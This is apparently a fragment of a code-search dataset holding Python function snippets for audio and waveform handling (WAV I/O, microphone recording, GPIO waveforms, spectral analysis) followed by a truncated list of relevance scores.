"def get_wav_info(file_name):\n wr = wave.open(file_name, 'r')\n sample_width = wr.getsampwidth()\n frame_rate = wr.getframerate()\n num_frames = wr.getnframes()\n n_channels = wr.getnchannels()\n s = \"sample width: {} bytes\\n\".format(sample_width) + \\\n \"frame rate: {} Hz\\n\".format(frame_rate) + \\\n \"num frames: {}\\n\".format(num_frames) + \\\n \"track length: {} s\\n\".format(num_frames / frame_rate) + \\\n \"num channels: {}\\n\".format(n_channels)\n\n return s",
"def get_signal(self, audio, gain, phase):\n max_delay_ms = self.center_ms + self.depth_ms\n max_length_samples = int(self.sample_rate / 1000.0 * max_delay_ms)\n\n depth_phase = self.depth_ms / max_delay_ms\n center_phase = self.center_ms / max_delay_ms\n phase = phase * depth_phase + center_phase\n wet_audio = core.variable_length_delay(\n audio=audio, phase=phase, max_length=max_length_samples\n )\n # Remove channel dimension.\n if gain.dim() == 3:\n gain = gain[:, 0, :]\n\n wet_audio *= gain\n return (wet_audio + audio) if self.add_dry else wet_audio",
"def pattern(self) -> str:\n return pulumi.get(self, \"pattern\")",
"def pattern(self) -> str:\n return pulumi.get(self, \"pattern\")",
"def pattern(self) -> str:\n return pulumi.get(self, \"pattern\")",
"def pattern(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"pattern\")",
"def wave(methodcnt): # NOTE - INSTANTIATE WITH SPECIAL CASE\n\tprint (\"waving\")\n\t#\treact_with_sound(confirmation_final)\n\treturn 0",
"def sp_audio_pipeline(wav):\n sig = sb.dataio.dataio.read_audio(wav)\n sig = sig.unsqueeze(0)\n sig = hparams[\"speed_perturb\"](sig)\n sig = sig.squeeze(0)\n return sig",
"def get_wave(q):\n\n approximant = 'SEOBNRv4'\n chi1 = [0,0,0]\n chi2 = [0,0,0]\n deltaTOverM = 0.1\n omega0 = 2e-2\n\n t, h = LALPy.generate_LAL_waveform(approximant, q, chi1, chi2, deltaTOverM, omega0)\n\n Amp = np.abs(h)\n peakIdx = np.argmax(Amp)\n\n t -= t[peakIdx]\n\n tmin = -500\n if min(t) > tmin:\n raise Exception('Data not long enough, decrease omega0.')\n keepIdx = t - tmin > -1e-3 # simple hack to ensure t_vec is always nearly the same\n t = t[keepIdx]\n h = h[keepIdx]\n\n tmax = 100\n keepIdx = t - tmax < 1e-3\n t = t[keepIdx]\n h = h[keepIdx]\n\n return t, h",
"def wave_get_pulses():\n return _u2i(_pigpio_command(_control, _PI_CMD_WVSP, 0, 0))",
"def audio_pipeline(wav):\n sig = sb.dataio.dataio.read_audio(wav)\n return sig",
"def audio_pipeline(wav):\n sig = sb.dataio.dataio.read_audio(wav)\n return sig",
"def sample(wave, factor):\n ys = np.zeros(len(wave))\n ys[::factor] = np.real(wave.ys[::factor])\n return Wave(ys, framerate=wave.framerate)",
"def getLastWave(self):\n lastWave=dict()\n lastWave['identifier']=self.lastWaveIdentifier\n lastWave['samplingTime']=self.lastSamplingTime\n lastWave['transferedChannels']=self.lastTransferredChannel\n lastWave['transferAverage']=self.lastTransferAverage\n lastWave['nbrSegmentArray']=self.lastNbrSegmentsArray\n lastWave['nbrSamplesPerSeg']=self.lastNbrSamplesPerSeg\n lastWave['waveSizes']=self.lastWaveformArraySizes\n lastWave['wave']=self.lastWaveformArray\n lastWave['timeStampsSize']=self.lastTimeStampsArraySize\n lastWave['timeStamps']=self.lastTimeStampsArray\n lastWave['horPosSize']=self.lastHorPositionsArraySize\n lastWave['horPos']=self.lastHorPositionsArray\n lastWave['averageCalculated']=self.lastAverageCalculated \n lastWave['lastAverageArray']=self.lastAverageArray \n return lastWave",
"def get_phrase(self):\n counter = 30 # give us a full 2 seconds of time to start\n\n with closing(self.Mic()) as mic:\n log.info('Recording phrase.')\n while True:\n frames = mic.next()\n\n score, has_disturbance = self.scorer.add(frames)\n\n if counter < 15 and has_disturbance:\n log.info('Recording more in phrase.')\n counter = 15\n else:\n counter -= 1\n\n if counter >= 1:\n yield frames",
"def get_file_bpm(path, params = {}):\n try:\n win_s = params['win_s']\n samplerate = params['samplerate']\n hop_s = params['hop_s']\n except:\n \"\"\"\n # super fast\n samplerate, win_s, hop_s = 4000, 128, 64 \n # fast\n samplerate, win_s, hop_s = 8000, 512, 128\n \"\"\"\n # default:\n samplerate, win_s, hop_s = 44100, 1024, 512\n\n s = source(path, samplerate, hop_s)\n samplerate = s.samplerate\n o = tempo(\"specdiff\", win_s, hop_s, samplerate)\n # List of beats, in samples\n beats = []\n # Total number of frames read\n total_frames = 0\n\n while True:\n samples, read = s()\n is_beat = o(samples)\n if is_beat:\n this_beat = o.get_last_s()\n beats.append(this_beat)\n #if o.get_confidence() > .2 and len(beats) > 2.:\n # break\n total_frames += read\n if read < hop_s:\n break\n\n # Convert to periods and to bpm \n bpms = 60./diff(beats)\n b = median(bpms)\n return b",
"def _get_pulse_shaping_waveform(self):\n self.pulse_shaping_list = []\n # Make the rise time be 3.3333% if the dot time.\n rise_time_in_msec = 0.03333333333333 * self.dot_time_in_msec\n # Limit the rise time to 2 milliseconds.\n if rise_time_in_msec > 0.002:\n rise_time_in_msec = 0.002\n rising_falling_count = int(rise_time_in_msec * self.sample_rate)\n step = math.pi / rising_falling_count\n # The first value is zero, so skip that value.\n # The last value is 1.0, so skip that value too.\n for i in range(1, rising_falling_count - 1):\n gain = 0.5 * (1.0 - math.cos(step * i))\n self.pulse_shaping_list.append(gain)",
"def view_wave(request, wave, ratio=1.6, dpi=144, **kwargs):\n\n fig = Figure(figsize=(5 * ratio,5), dpi=dpi)\n fig.patch.set_facecolor('white')\n axes = fig.add_subplot(111)\n axes.set_xlabel(\"Time (s)\", fontsize=8)\n plot.subplot_waveform(wave, axes, **kwargs)\n process_plot_args(request, axes)\n canvas = FigureCanvas(fig)\n response = HttpResponse(content_type='image/png')\n fig.tight_layout()\n canvas.print_png(response)\n return response",
"def get_tone(self, call_vector, duration):\n if duration == 0:\n return\n nsamples = int(self.sample_rate * duration)\n values = []\n fvector = (self.fm_freq, self.hfm_freq, self.sv_freq)\n for i in range(0, nsamples):\n try:\n if type(fvector[1]) == tuple:\n tone = self.__get_waveval2(i, call_vector, fvector)\n else:\n tone = self.__get_waveval(i, call_vector, fvector)\n except ValueError:\n print \"ERROR: Sum of calls cannot exceed max calls\"\n print \"Cleaning up...\"\n print \"No files written.\"\n os.remove(self.output)\n exit(1)\n signal = wave.struct.pack('h', tone) # convert to binary\n values.append(signal)\n value_string = \"\".join(values)\n return value_string",
"def wavematch(w, wp, sl, wlimit=10):\n\n # first remove anything already in the self.wp from the sl list\n lines = []\n for x in sl:\n if x not in wp:\n lines.append(x)\n if not lines:\n return -1\n lines = np.array(lines)\n\n # find the best match\n dist = abs(lines - w)\n if dist.min() < wlimit:\n i = dist.argmin()\n else:\n return -1\n\n # return the values\n return lines[i]",
"def build_pulse_waveform(startper,endper):\r\n mywaveform = numpy.zeros(100, dtype=numpy.int)\r\n if startper > endper:\r\n mywaveform[0:endper]=1\r\n mywaveform[startper:100]=1\r\n else:\r\n mywaveform[startper:endper]=1 \r\n return mywaveform",
"def captured_signal(waveform, shift, p):\n return time_varying_delay(waveform, shift, p)",
"def get_pattern(self, name):\n return self.__patterns[name]",
"def record():\n p = pyaudio.PyAudio()\n stream = p.open(format=FORMAT, input_device_index=0, channels=1, rate=RATE, input=True, output=True, frames_per_buffer=CHUNK_SIZE)\n num_silent = 0\n snd_started = False\n\n r = array('h')\n while 1:\n snd_data = array('h', stream.read(CHUNK_SIZE, exception_on_overflow = False))\n if byteorder == 'big':\n snd_data.byteswap()\n r.extend(snd_data)\n\n silent = is_silent(snd_data)\n if silent and snd_started:\n num_silent += 1\n elif not silent and not snd_started:\n print(\"Sound started.\")\n snd_started = True\n\n if snd_started and num_silent> 10:\n break\n\n sample_width = p.get_sample_size(FORMAT)\n stream.stop_stream()\n stream.close()\n p.terminate()\n\n r = normalize(r)\n #r = trim(r)\n #r = add_silence(r, 0.5)\n return sample_width, r",
"def record():\n p = pyaudio.PyAudio()\n stream = p.open(format=FORMAT, channels=1, rate=RATE,\n input=True, output=True,\n frames_per_buffer=CHUNK_SIZE)\n\n num_silent = 0\n snd_started = False\n\n r = array('h')\n\n while 1:\n # little endian, signed short\n snd_data = array('h', stream.read(CHUNK_SIZE))\n if byteorder == 'big':\n snd_data.byteswap()\n r.extend(snd_data)\n\n silent = is_silent(snd_data)\n\n if silent and snd_started:\n num_silent += 1\n elif not silent and not snd_started:\n snd_started = True\n\n if snd_started and num_silent > 30:\n break\n\n sample_width = p.get_sample_size(FORMAT)\n stream.stop_stream()\n stream.close()\n p.terminate()\n\n r = normalize(r)\n r = trim(r)\n r = add_silence(r, 0.5)\n return sample_width, r",
"def testWaveform(self):\n\n\t\twg = waveform.Generator(frequency=Quantity(2, 'Hz'))\n\n\t\twg.delay(Quantity(2, 's'))\n\t\twg.marker(1, True)\n\t\twg.marker(2, True)\n\t\twg.pulse([], 0.5, Quantity(1, 's'))\n\t\twg.pulse([1.0, 0.0, -1.0], 1.0, Quantity(3, 's'))\n\t\twg.marker(1, False)\n\t\twg.square(-0.5, Quantity(2, 's'))\n\n\t\texpected = [0.0, 0.0, 0.0, 1.0, 0.6, 0.2, -0.2, -0.6, -1.0, -0.5, -0.5, -0.5, -0.5, -1.0]\n\n\t\twave, markers = wg.waveform\n\t\tassert_array_almost_equal(wave, expected, 4)\n\t\teq_(markers[1], [False] * 3 + [True] * 6 + [False] * 5)\n\t\teq_(markers[2], [False] * 3 + [True] * 11)\n\t\tassert 3 not in markers",
"def custom_sound(type_of, attack, decay, cutoff, coef, time, freq):\n dzw = np.zeros(time*44100)\n l=0\n for i in type_of:\n if i==\"sin\":\n dzw+= coef[l]*sin_custom(freq,time,attack[l],decay[l])\n if i==\"sq\":\n dzw+= coef[l]*sq_custom(freq,time,attack[l],decay[l])\n if i==\"saw\":\n dzw+= coef[l]*saw_custom(freq,time,attack[l],decay[l])\n l+=1 \n dzw[(1-cutoff)*time*44100 -1:]==0\n dzw = np.repeat(dzw,2).reshape(len(dzw),2)\n dzw = dzw/np.amax(dzw)\n return(dzw)",
"def getWaveform(self, ch=\"CH1\", samples=2500):\n\t\tself.isReady()\n\t\tcounter = 1\n\t\twhile True:\n\t\t\ttry:\t\t\n\t\t\t\twaveform = self.osc.get_waveform(source = ch, start = 1, stop = samples)\n\t\t\t\tbreak\n\t\t\texcept:\n\t\t\t\tprint(\"Retry: \" + str(counter))\n\t\t\t\tcounter += 1\n\t\ty_array = []\n\t\tfor x,y in waveform:\n\t\t\ty_array.append(y)\n\t\treturn y_array",
"def waveforms(self):\n return list(self._waveforms)",
"def next_wave(self):\n if self._wave == self._level.get_max_wave():\n return\n\n self._wave += 1\n\n #Task 1.3 (Status Bar): Update the current wave display here\n self._status_bar.set_wave(self._wave)\n\n #Task 1.5 (Play Controls): Disable the add wave button here (if this is the last wave)\n if self._wave == 20:\n self._wave_button.config(state=tk.DISABLED)\n\n #Generate wave and enqueue\n wave = self._level.get_wave(self._wave, self._game)\n for step, enemy in wave:\n enemy.set_cell_size(self._game.grid.cell_size)\n\n self._game.queue_wave(wave)",
"def record():\n p = pyaudio.PyAudio()\n stream = p.open(format=FORMAT, channels=1, rate=RATE,\n input=True, output=True,\n frames_per_buffer=CHUNK_SIZE)\n\n num_silent = 0\n snd_started = False\n\n r = array('h')\n\n while 1:\n # little endian, signed short\n snd_data = array('h', stream.read(CHUNK_SIZE))\n if byteorder == 'big':\n snd_data.byteswap()\n r.extend(snd_data)\n\n silent = is_silent(snd_data)\n\n if silent and snd_started:\n num_silent += 1\n elif not silent and not snd_started:\n snd_started = True\n\n if snd_started and num_silent > SILENCE:\n break\n\n sample_width = p.get_sample_size(FORMAT)\n stream.stop_stream()\n stream.close()\n p.terminate()\n\n r = normalize(r)\n r = trim(r)\n r = add_silence(r, 0.5)\n return sample_width, r",
"def wavelength(self):\n return self.getparam(\"WAVELENGTH\")",
"def wavelength(self):\n return self.getparam(\"WAVELENGTH\")",
"def record_audio_to_file_and_get_wav(self, time, file_name):\n sample_width, frames = self.record_audio(time)\n wf = wave.open(file_name, 'wb')\n wf.setnchannels(self.channels)\n wf.setsampwidth(sample_width)\n wf.setframerate(self.rate)\n wf.writeframes(frames)\n wf.close()\n return WavFile(samples=frames, sample_width=sample_width, time=time, word=file_name)",
"def setwave(hdr):\n\n # Parse the header\n npix = hdr['NAXIS1']\n crpix1 = hdr['CRPIX1'] if 'CRPIX1' in hdr else 1.\n crval1 = hdr['CRVAL1']\n\n cdelt1, dc_flag = get_cdelt_dcflag(hdr)\n\n # Generate\n wave = crval1 + cdelt1 * (np.arange(npix) + 1. - crpix1)\n if dc_flag == 1:\n wave = 10.**wave # Log\n\n return wave",
"def getWaveform(self, filename, ch):\n if filename in self.sndfiles:\n return self.grid.getWaveform(self.sndfiles[filename], ch)",
"def get_waveform_info():\n dpo.write('acquire:stopafter sequence')\n dpo.write('acquire:state on')\n dpo.query('*OPC?')\n binaryFormat = dpo.query('wfmoutpre:bn_fmt?').rstrip()\n print('Binary format: ', binaryFormat)\n numBytes = dpo.query('wfmoutpre:byt_nr?').rstrip()\n print('Number of Bytes: ', numBytes)\n byteOrder = dpo.query('wfmoutpre:byt_or?').rstrip()\n print('Byte order: ', byteOrder)\n encoding = dpo.query('data:encdg?').rstrip()\n print('Encoding: ', encoding)\n if 'RIB' in encoding or 'FAS' in encoding:\n dType = 'b'\n bigEndian = True\n elif encoding.startswith('RPB'):\n dType = 'B'\n bigEndian = True\n elif encoding.startswith('SRI'):\n dType = 'b'\n bigEndian = False\n elif encoding.startswith('SRP'):\n dType = 'B'\n bigEndian = False\n elif encoding.startswith('FP'):\n dType = 'f'\n bigEndian = True\n elif encoding.startswith('SFP'):\n dType = 'f'\n bigEndian = False\n elif encoding.startswith('ASCI'):\n raise visa.InvalidBinaryFormat('ASCII Formatting.')\n else:\n raise visa.InvalidBinaryFormat\n return dType, bigEndian",
"def wave_create():\n return _u2i(_pigpio_command(_control, _PI_CMD_WVCRE, 0, 0))",
"def wavPlayer(data, rate, scale=False, autoplay=False):\r\n #if np.max(abs(data)) > 1 or scale:\r\n # data = data/np.max(abs(data))\r\n #data = (2**13*data).astype(np.int16)\r\n \r\n buffer = BytesIO()\r\n buffer.write(b'RIFF')\r\n buffer.write(b'\\x00\\x00\\x00\\x00')\r\n buffer.write(b'WAVE')\r\n \r\n buffer.write(b'fmt ')\r\n if data.ndim == 1:\r\n noc = 1\r\n else:\r\n noc = data.shape[1]\r\n \r\n bits = data.dtype.itemsize * 8\r\n sbytes = rate*(bits // 8)*noc\r\n ba = noc * (bits // 8)\r\n buffer.write(struct.pack('<ihHIIHH', 16, 1, noc, rate, sbytes, ba, bits))\r\n\r\n # data chunk\r\n buffer.write(b'data')\r\n buffer.write(struct.pack('<i', data.nbytes))\r\n\r\n if data.dtype.byteorder == '>' or (data.dtype.byteorder == '=' and sys.byteorder == 'big'):\r\n data = data.byteswap()\r\n\r\n buffer.write(data.astype(np.int16).tostring())\r\n\r\n # Determine file size and place it in correct position at start of the file.\r\n size = buffer.tell()\r\n buffer.seek(4)\r\n buffer.write(struct.pack('<i', size-8))\r\n \r\n val = buffer.getvalue()\r\n autoplay = \" autoplay=\\\"autoplay\\\"\"*autoplay + \"\"\r\n \r\n src = \"\"\"<audio controls=\"controls\" style=\"width:600px\"{autoplay}>\r\n <source controls src=\"data:audio/wav;base64,{base64}\" type=\"audio/wav\" />\r\n Your browser does not support the audio element.\r\n </audio>\"\"\".format(base64=base64.b64encode(val).decode(\"ascii\"), autoplay=autoplay)\r\n display(HTML(src))",
"def get_cw_freq(self):\n return self.get_frequency(self.synth)",
"def wave(pi, gpio, hz, secs, on=1, offset=0):\n micros_left = int(secs * 1000000)\n transitions = int(2 * hz * secs)\n micros = micros_left / transitions\n\n if (offset < 0) or (offset > micros):\n print(\"Illegal offset {} for hz {}\".format(offset, hz))\n exit()\n\n pi.set_mode(gpio, pigpio.OUTPUT)\n\n wf = [] # Empty waveform.\n\n if offset:\n wf.append(pigpio.pulse(0, 0, offset))\n micros_left -= micros\n last_micros = micros - offset\n transitions -= 1\n\n for t in range(transitions, 0, -1):\n micros = micros_left / t\n if (t & 1) == (on & 1):\n wf.append(pigpio.pulse(0, 1<<gpio, micros))\n else:\n wf.append(pigpio.pulse(1<<gpio, 0, micros))\n micros_left -= micros\n\n if offset:\n if on:\n wf.append(pigpio.pulse(1<<gpio, 0, last_micros))\n else:\n wf.append(pigpio.pulse(0, 1<<gpio, last_micros))\n\n pi.wave_add_generic(wf)\n pi.wave_send_repeat(pi.wave_create())",
"def getWaveSample( self, position ):\n\t\td = self.data[position]\n\t\treturn d",
"def get_sound(self, path):\n\n # Get sound node\n paths = path.split('/')\n sound_path = f'{paths[0]}.img/{paths[1]}'\n sound_node = self.file.resolve(sound_path)\n if not sound_node:\n return None\n\n # Get sound data\n sound = sound_node.get_sound()\n data = io.BytesIO(sound[82:])\n\n # header = sound[32:82]\n # fmt = int.from_bytes(header[8:12], 'big')\n # channels = int.from_bytes(header[22:24], 'little')\n # sample_rate = int.from_bytes(header[24:28], 'little')\n # byte_rate = int.from_bytes(header[28:32], 'little')\n # block_align = int.from_bytes(header[32:34], 'little')\n # bits_per_sample = int.from_bytes(header[34:36], 'little')\n\n # Convert to wav\n audio_bytes = io.BytesIO()\n audio = AudioSegment.from_file(data)\n audio.export(audio_bytes,\n format='wav',\n codec='pcm_s16le',\n parameters=['-ar', '44100'])\n return audio_bytes.getbuffer()",
"def get_combLine(self):\r\n # print '*********in get comline'\r\n self.get_frequency()\r\n ## Wavemeter measurements\r\n #########################\r\n f_wavem_ = []\r\n #averages 20 wavemeter readings\r\n for nn in range(20): \r\n self.meter.set_lambda_units('GHz') # set measurement unit ('nm', 'GHz' or 'cm')\r\n lam = self.meter.get_lambda() # gets the current Wavelength\r\n if lam > 1:\r\n f_wavem_.append(lam*1e9)\r\n f_wavem_avg = numpy.mean(f_wavem_)\r\n f_wavem = round(f_wavem_avg,0)\r\n ## calculation of locking mode number\r\n #####################################\r\n n = (f_wavem-self.sign_lock*self.f_lock-self.sign_0*self.f_0)/self.f_rep\r\n self.n = round(n,0)\r\n self.get_synth_tolerance()\r\n \r\n # print 'f_0 = %.0f Hz'%self.f_0\r\n # print 'f_rep = %.0f Hz'%self.f_rep\r\n # print 'f_wavem = %.0f Hz'%f_wavem\r\n # print 'f_lock = %.0f Hz'%self.f_lock\r\n # print 'n = %.2f'%n\r",
"def get_spectral_response(wavelengths_arr, stack):\n\n resolution = 1\n for i, re_index in enumerate(stack.index):\n step_size = stack.thickness.sum() / 2 ** 17\n z0 = np.linspace(0, stack.thickness[i], round(stack.thickness[i] / step_size))\n resolution += len(z0)\n\n electric_tot_te = np.zeros([resolution, len(wavelengths_arr)], dtype=complex)\n electric_tot_tm = np.zeros([resolution, len(wavelengths_arr)], dtype=complex)\n reflectivity_te = np.zeros(len(wavelengths_arr), dtype=complex)\n reflectivity_tm = np.zeros(len(wavelengths_arr), dtype=complex)\n transmission_te = np.zeros(len(wavelengths_arr), dtype=complex)\n transmission_tm = np.zeros(len(wavelengths_arr), dtype=complex)\n index_tot = np.zeros([resolution, len(wavelengths_arr)], dtype=complex)\n theta_tot = np.zeros([len(stack.index) + 1, wavelengths_arr.size], dtype=complex)\n\n a0 = 1 # Initial amplitude of electric field going toward the coating\n b0 = 0 # Initial amplitude of electric field going back the coating (if 0, no counter propagating light)\n theta = 0 # angle of the beam with respect to the coating\n\n for i, lam in enumerate(wavelengths_arr):\n # print a progressbar in the console\n print_progressbar(i, len(wavelengths_arr), suffix = '%')\n electric_tot_te[:, i], electric_tot_tm[:, i], reflectivity_te[i], reflectivity_tm[i], transmission_te[i], \\\n transmission_tm[i], index_tot, L, theta_tot = transfer_matrix_method(stack, a0, b0, lam, theta)\n return reflectivity_te, transmission_te, 1 - (reflectivity_te + transmission_te)",
"def fingerprint_wave(file):\n\n\twav = wave.open(file, 'rb')\n\tif wav.getnchannels() == 1:\n\t\tstereo = 0\n\telif wav.getnchannels() == 2:\n\t\tstereo = 1\n\telse:\n\t\twav.close()\n\t\traise Exception(\"Only 1 or 2 channel WAV files supported\")\n\n\twidth = wav.getsampwidth()\n\tif width != 2:\n\t\twav.close()\n\t\traise Exception(\"Only 16-bit sample widths supported\")\n\n\tsrate = wav.getframerate()\t\n\n\tbuffer = wav.readframes(wav.getnframes())\n\twav.close()\n\n\tms = (len(buffer) / 2)/(srate/1000)\n\tif stereo == 1:\n\t\tms = ms / 2\n\t\n\tfprint = libofa.create_print(buffer, libofa.BYTE_ORDER_LE, len(buffer) / 2,\n\t\t\t\t\t\t\t\tsrate, stereo);\n\n\treturn (fprint, ms)",
"def pattern(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"pattern\")",
"def pattern(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"pattern\")",
"def get_mask_wave(self, i_order):\n\n attrs = ['wave_p', 'wave_m', 'i_bounds']\n wave_p, wave_m, i_bnds = self.get_attributes(*attrs, i_order=i_order)\n wave_min = self.wave_grid[i_bnds[0]]\n wave_max = self.wave_grid[i_bnds[1] - 1]\n\n mask = (wave_m < wave_min) | (wave_p > wave_max)\n\n return mask",
"def _getWavelet(self, ch='dos1rate', thresh=0.1, maxWidth=1, SIGNIF_LEVEL=0.25):\n # Feed the counts into the wavelet microburst finder\n validDataIdt = np.where(self.d[ch] != -1E31)[0]\n waveletAnalysis.WaveletDetector.__init__(self, self.d[ch][validDataIdt], \n self.d['dateTime'][validDataIdt], 0.1, mother='DOG', siglvl=0.95)\n self.waveletTransform() # Get wavelet space\n self.waveletFilter(self.s0, maxWidth, SIGNIF_LEVEL=SIGNIF_LEVEL) # Do a band pass and significance filter.\n self.degenerateInvWaveletTransform() # Inverse transform filtered data.\n # Indicies where the error-filetered data is greater than thresh\n self.burstIdt = np.where(self.dataFlt > thresh)[0] \n self._getPeaks(ch, validDataIdt) # Find peaks\n return",
"def Get_DataRateAndBandwidth(self):\r\n current = self.__readFromRegister(self.__REG_RW_CTRL_REG1, self.__MASK_CTRL_REG1_DR | self.__MASK_CTRL_REG1_BW)\r\n for dr in self.__DRBW.keys():\r\n for bw in self.__DRBW[dr].keys():\r\n if self.__DRBW[dr][bw] == current:\r\n return (dr, bw)",
"def getPulseWave(ham: Dict[str, Any], names: Union[str, List[str]]) -> Dict[str, Any]:\n if isinstance(names, str):\n return ham[\"control\"][names][\"waveforms\"]\n else:\n waves = {}\n for name in names:\n wave = ham[\"control\"][names][\"waveforms\"]\n waves[name] = wave\n return waves",
"def get_spectral(period, stream, damping, rotation=None):\n T = period\n freq = 1.0 / T\n omega = (2 * 3.14159 * freq) ** 2\n paz_sa = corn_freq_2_paz(freq, damp=damping)\n paz_sa['sensitivity'] = omega\n paz_sa['zeros'] = []\n spect_stream = Stream()\n\n horizontals = []\n for idx, trace in enumerate(stream):\n # Group all of the max values from traces without\n # Z in the channel name\n if 'Z' not in trace.stats['channel'].upper():\n horizontals += [trace.copy()]\n h1_stats = horizontals[0].stats\n\n if rotation is None:\n for trace in stream:\n samp_rate = trace.stats['sampling_rate']\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n dd = simulate_seismometer(trace.data, samp_rate,\n paz_remove=None,\n paz_simulate=paz_sa,\n taper=True,\n simulate_sensitivity=True,\n taper_fraction=0.05)\n period_str = 'T' + '{:04.2f}'.format(T)\n stats_out = trace.stats.copy()\n stats_out['period'] = period_str\n spect_trace = Trace(dd, stats_out)\n spect_trace.data = spect_trace.data * GAL_TO_PCTG\n spect_trace.stats['units'] = '%%g'\n spect_stream.append(spect_trace)\n return spect_stream\n elif rotation.lower() == 'nongm':\n if len(horizontals) != 2:\n warnings.warn('Spectral amplitude rotation could not be performed.')\n return\n rot = [rotate(horizontals[0], horizontals[1], combine=True)]\n elif rotation.lower() == 'gm':\n if len(horizontals) != 2:\n warnings.warn('Spectral amplitude rotation could not be performed.')\n return\n rot1, rot2 = rotate(horizontals[0], horizontals[1], combine=False)\n rot = [rot1, rot2]\n rotated = []\n for rot_matrix in rot:\n rotated_spectrals = np.zeros(rot_matrix.shape)\n for idx, row in enumerate(rot_matrix):\n samp_rate = h1_stats['sampling_rate']\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n dd = simulate_seismometer(row, samp_rate,\n paz_remove=None,\n paz_simulate=paz_sa,\n taper=True,\n simulate_sensitivity=True,\n taper_fraction=0.05)\n\n period_str = 'T' + '{:04.2f}'.format(T)\n stats_out = h1_stats.copy()\n stats_out['period'] = period_str\n spect_trace = Trace(dd, stats_out)\n spect_trace.data = spect_trace.data * GAL_TO_PCTG\n spect_trace.stats['units'] = '%%g'\n rotated_spectrals[idx] = spect_trace\n rotated += [rotated_spectrals]\n return rotated",
"def wave_tx_start():\n return _u2i(_pigpio_command(_control, _PI_CMD_WVGO, 0, 0))",
"def get_recorded_audio(self):\n return self.frames",
"def pattern(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"pattern\")",
"def get_spectrum(self):\n\n self.sock.send('Q')\n self.sock.send(str(100 * self.center_wl))\n\n response = self.sock.recv(7)\n if not response:\n raise InstrumentError(\n 'No response from Labview client, try reconnecting')\n\n datalen = int(response)\n data = ''\n\n while datalen > 0:\n # read data in chunks\n dt = self.sock.recv(datalen)\n data += dt\n datalen -= len(dt)\n\n data = data.split(\"\\n\")[:-1]\n for i in range(len(data)):\n data[i] = data[i].split(\"\\t\")\n\n data = n.array(data,dtype=float)\n\n wl = data[0]\n ccd = data[1:]\n\n return wl,ccd\n\n #self.sock.close()",
"def spect(self):\n return 1",
"def get_pattern(N, d, wavelength, phi, amplitude_law, minimum_amplitude, logScale=True):\r\n # Compute phase and amplitudes laws\r\n amp_law = get_amplitude_law(N, amplitude_law, minimum_amplitude)\r\n phase_law = get_phase_law(N, d, wavelength, phi)\r\n \r\n theta = np.arange(-np.pi/2, np.pi/2, np.radians(0.1))\r\n mag = []\r\n for theta_i in theta:\r\n im = re = 0\r\n # Phase shift due to off-boresight angle\r\n psi = 2 * np.pi * d / wavelength * np.sin(theta_i)\r\n # Compute sum of effects of elements\r\n for n in range(N):\r\n im += amp_law[n] * np.sin(n*psi + phase_law[n])\r\n re += amp_law[n] * np.cos(n*psi + phase_law[n])\r\n magnitude = np.sqrt(re**2 + im**2)/N\r\n if logScale:\r\n magnitude = 20*np.log10(magnitude)\r\n mag.append(magnitude)\r\n \r\n return theta, mag, amp_law, phase_law",
"def _get_spectrograms(self, index):\n file = self._waves[index]\n\n # get hyper-parameters\n hp = self.hparams\n\n w, _ = lr.load(file, sr=hp.sr)\n w, _ = lr.effects.trim(w) # triming\n\n linear = audio.wave2spec(w, hp)\n\n return linear, w",
"def readWaveformNames(self):\n self.sendMessage('WLIST:SIZE?')\n ansr=self.readMessage()\n msg=[]\n for i in xrange (1,int(ansr)+1):\n msg.append('WLIST:NAME? '+str(i))\n self.sendMessage(msg)\n wnames = self.readMessage()\n names=re.findall('\".*?\"',wnames)\n strippednames=[]\n for name in names:\n strippednames.append(name.rstrip('\"').lstrip('\"'))\n return strippednames",
"def GetWavelengths (self) :\n\t\treturn self.run(\"GetWavelengths\")",
"def colorlaw(self, wave=None):\n if wave is None:\n wave = self._wave\n else:\n wave = np.asarray(wave)\n if wave.ndim == 0: \n return self._colorlaw(np.ravel(wave))[0]\n else:\n return self._colorlaw(wave)",
"def rmsilence(sample):\n ns, ne = sample.wordseq[0][0][0], sample.wordseq[-1][0][1]\n return sample.signal[ns:ne]",
"def get_weights(mc_par, spectral_par):\n r = rate(\"PowerLaw\",\n mc_par['emin'], mc_par['emax'],\n spectral_par, mc_par['cone'], mc_par['area_sim'])\n\n w = weight(\"PowerLaw\",\n mc_par['emin'], mc_par['emax'],\n mc_par['sp_idx'], r,\n mc_par['sim_ev'], spectral_par)\n return w",
"def record(self):\n\n while True:\n frames = []\n self.stream.start_stream()\n for i in range(self.num_frames):\n data = self.stream.read(FRAMES_PER_BUFFER)\n frames.append(data)\n self.output.seek(0)\n w = wave.open(self.output, 'wb')\n w.setnchannels(CHANNELS)\n w.setsampwidth(self.audio.get_sample_size(FORMAT))\n w.setframerate(RATE)\n w.writeframes(b''.join(frames))\n w.close()\n yield",
"def _record_wav(stream, N, CHUNK):\n frames = []\n for i in range(N):\n data = stream.read(CHUNK)\n frames.append(data)\n return np.fromstring(b\"\".join(frames), 'Int16')"
] | [
"0.5981788",
"0.5724615",
"0.56906223",
"0.5673661",
"0.56648856",
"0.544376",
"0.54234815",
"0.5388818",
"0.5373861",
"0.53209776",
"0.53193724",
"0.5285998",
"0.52687967",
"0.5267398",
"0.51937246",
"0.5191461",
"0.5150314",
"0.5148032",
"0.51321924",
"0.5121972",
"0.5121972",
"0.51162314",
"0.5113482",
"0.51080644",
"0.5107305",
"0.50997585",
"0.50965",
"0.5076782",
"0.50737554",
"0.5073261",
"0.50691676",
"0.50579846",
"0.5049537",
"0.50489765",
"0.5040555",
"0.50231206",
"0.50231206",
"0.50231206",
"0.5015919",
"0.50052613",
"0.5002976",
"0.49937323",
"0.49865744",
"0.4965181",
"0.4965181",
"0.49512777",
"0.49485463",
"0.49463305",
"0.49443266",
"0.4938828",
"0.49355376",
"0.48933876",
"0.48908025",
"0.4887688",
"0.48723918",
"0.4863659",
"0.4851648",
"0.48452222",
"0.48425525",
"0.48398793",
"0.48339698",
"0.48331252",
"0.48308372",
"0.48284227",
"0.48147464",
"0.48147464",
"0.48087412",
"0.48070666",
"0.48069268",
"0.48068205",
"0.479937",
"0.47918564",
"0.47765115",
"0.47729513",
"0.47589156",
"0.47513583",
"0.47452554",
"0.47406584",
"0.4738934",
